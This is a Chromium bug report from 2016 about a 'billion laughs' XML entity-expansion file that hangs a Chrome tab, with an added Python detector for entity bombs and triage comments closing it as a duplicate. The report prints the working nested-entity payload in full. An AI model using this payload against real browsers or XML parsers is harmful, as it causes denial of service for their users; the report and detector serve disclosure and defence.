
Issue 616444


Issue metadata

Status: Duplicate
Merged: issue 602552
Owner:
Closed: Jun 2016
Components:
EstimatedDays: ----
NextAction: ----
OS: Linux
Pri: 2
Type: Bug




XML External Entities - DOS

Reported by mohammad...@gmail.com, Jun 1 2016

Issue description

UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36

Steps to reproduce the problem:
1. Host a web server and put this XML file on it.

> cat billion.xml

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

2. Open Chrome and visit the above link

What is the expected behavior?
The browser tab should not hang

What went wrong?
The browser tab hung

Did this work before? N/A 

Chrome version: 50.0.2661.102  Channel: stable
OS Version: 
Flash Version: Shockwave Flash 21.0 r0

This is similar to https://bugs.chromium.org/p/chromium/issues/detail?id=9937
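
An added example, not part of the original report or of Chromium's code: a pre-parse check that computes how large each internal entity in a DTD would become after full expansion, using arithmetic only, so nested definitions like the ones in the report can be flagged without being expanded. The function names, the 10,000,000-character limit and the regex-based DTD scan (internal general entities only) are assumptions made for illustration.

```python
import re

# Internal general entities only: <!ENTITY name "value"> (no %param; or SYSTEM)
ENTITY_DECL = re.compile(r'<!ENTITY\s+([\w.:-]+)\s+(["\'])(.*?)\2\s*>', re.S)
ENTITY_REF = re.compile(r'&([\w.:-]+);')  # does not match &#NN; char refs
PREDEFINED = {"lt", "gt", "amp", "apos", "quot"}

def expanded_sizes(doc):
    """Map each entity name to its length after full expansion (memoised)."""
    decls = {}
    for m in ENTITY_DECL.finditer(doc):
        decls.setdefault(m.group(1), m.group(3))  # first declaration wins
    sizes = {}

    def size(name, stack):
        if name in PREDEFINED:
            return 1
        if name in stack:
            raise ValueError("recursive entity reference: " + name)
        if name not in sizes:
            value = decls.get(name, "")  # undeclared name contributes nothing
            literal = len(ENTITY_REF.sub("", value))
            sizes[name] = literal + sum(
                size(ref, stack | {name}) for ref in ENTITY_REF.findall(value))
        return sizes[name]

    for name in decls:
        size(name, frozenset())
    return sizes

def is_entity_bomb(doc, max_expanded=10_000_000):  # limit is an assumed value
    """True if any entity expands past max_expanded chars or is recursive."""
    try:
        return any(n > max_expanded for n in expanded_sizes(doc).values())
    except ValueError:
        return True

def nested_sample(levels, fanout):
    """Constructed input with the same shape as the file in the report."""
    decls, prev = ['<!ENTITY lol "lol">'], "lol"
    for i in range(1, levels + 1):
        decls.append('<!ENTITY lol%d "%s">' % (i, ("&%s;" % prev) * fanout))
        prev = "lol%d" % i
    return '<!DOCTYPE lolz [\n%s\n]>\n<lolz>&%s;</lolz>' % ("\n".join(decls), prev)

if __name__ == "__main__":
    print(expanded_sizes(nested_sample(9, 10))["lol9"])
```

With nine levels of ten references each, as in the report, the 3-character base entity grows by a factor of ten per level, which is why a file of a few hundred bytes can stall a parser that expands it eagerly.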
 

Comment 1 by f...@chromium.org, Jun 2 2016

Components: Blink>XML
Thanks for the report!

Comment 2 by f...@chromium.org, Jun 2 2016

Labels: Security_Impact-Stable
Owner: dominicc@chromium.org
Status: Assigned (was: Unconfirmed)
dominicc@, could you please take a look at this?

DOS attacks typically are not marked as security bugs, but I'm concerned that there might be another underlying issue/bug here.

Comment 3 by f...@chromium.org, Jun 3 2016

Components: Security
Labels: -Type-Bug-Security -Security_Impact-Stable Type-Bug
Mergedinto: 602552
Status: Duplicate (was: Assigned)

Comment 5 by sheriffbot@chromium.org, Sep 12 2016

Labels: -Restrict-View-SecurityTeam
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
